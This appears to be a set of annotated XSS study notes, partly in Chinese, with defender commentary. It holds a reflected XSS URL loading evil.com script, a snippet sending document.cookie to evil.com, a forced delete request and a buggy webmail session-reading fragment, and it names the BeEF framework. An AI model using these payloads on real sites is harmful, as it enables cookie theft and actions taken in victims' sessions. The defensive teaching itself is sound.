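反射型XSS示例:假设参数 abc 的值未经编码被原样写回页面,其中的 "> 会先闭合原有的属性和标签,随后的 script 标签就会从外部域加载脚本。防御要点:按输出上下文对参数值做HTML编码,并用 Content-Security-Policy 限制脚本来源。
http://www.a.com/test.html?abc="><script src=http://www.evil.com/evil.js></script>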
窃取Cookie:
// Cookie-exfiltration sample, kept for analysis: it creates an <img> element and
// points its src at a third-party host with document.cookie appended as the
// query string, so the browser's image fetch carries the cookie values out.
// Defender notes:
//  - document.cookie only returns cookies without the HttpOnly attribute, so
//    marking session cookies HttpOnly keeps them out of this script's reach.
//  - A Content-Security-Policy with a restrictive img-src (and script-src)
//    blocks the outbound request and the injected script respectively.
//  - In proxy or web-server logs, look for image requests to unfamiliar hosts
//    whose query string contains URL-encoded cookie names.
var img =document.createElement("img");
// escape() percent-encodes the cookie string so it can be carried in the URL.
img.src="http://www.evil.com/log?"+escape(document.cookie);
// The element is attached to the page body.
document.body.appendChild(img);
执行删除文章:
// Same <img> technique as the cookie sample, but here the src is an application
// URL (host elided in the original notes) that, per the heading above, deletes
// an article. The request is issued by the victim's own browser.
// Defender notes:
//  - State-changing actions should not be reachable through GET; require POST
//    (or DELETE) together with an anti-CSRF token and check the Origin header.
//  - Script injected into the page runs inside the site's origin and acts with
//    the user's session, so the root fix is context-aware output encoding of
//    the reflected value; CSRF defences alone only raise the bar.
var img=document.createElement("img");
img.src="http://...../delete$id=1";
document.body.appendChild(img);
XSS Payload mail:
// Webmail sample, kept for analysis. This is a fragment: the bare `return`
// below implies an enclosing function that is not shown, and folder_url is
// defined somewhere outside the visible lines.
// Defender notes:
//  - A session identifier carried in the URL is readable by any script running
//    in the page and also leaks through Referer headers, history and logs;
//    keep session identifiers in HttpOnly cookies instead.
//  - Requests made from injected script are same-origin, so the server cannot
//    tell them from the user's own; prevention rests on sanitising HTML mail
//    content before rendering and on a restrictive Content-Security-Policy.

// When the top-level window's URL contains "sid=" at an index greater than 0,
// copy the 24 characters that follow it into sid.
if (top.window.location.href.indexOf("sid=")>0){
var sid= top.window.location.href.substr(top.window.location.href.indexOf("sid=")+4,24);}
var ajax=null;
// When window.XMLHttpRequest is present, this line instantiates the legacy
// ActiveXObject("Microsoft.XMLHTTP"); otherwise the fragment returns.
if(window.XMLHttpRequest){ajax=new ActiveXObject("Microsoft.XMLHTTP");
}
else{
return;
}
// Asynchronous GET to folder_url (presumably a mailbox folder listing - not
// shown here; confirm against the full sample).
ajax.open("GET",folder_url,true);
ajax.send(null);
// The handler compares ajax.readystate with 4 and ajax.status with 200; when
// both match it displays the response body in an alert dialog. sid is not
// used anywhere in the visible lines.
ajax.onreadystatechange = function() {
if(ajax.readystate==4 && ajax.status==200){
alert(ajax.responseText);
//document.write(ajax.responseText)
}
}
XSS 攻击平台:
BeEF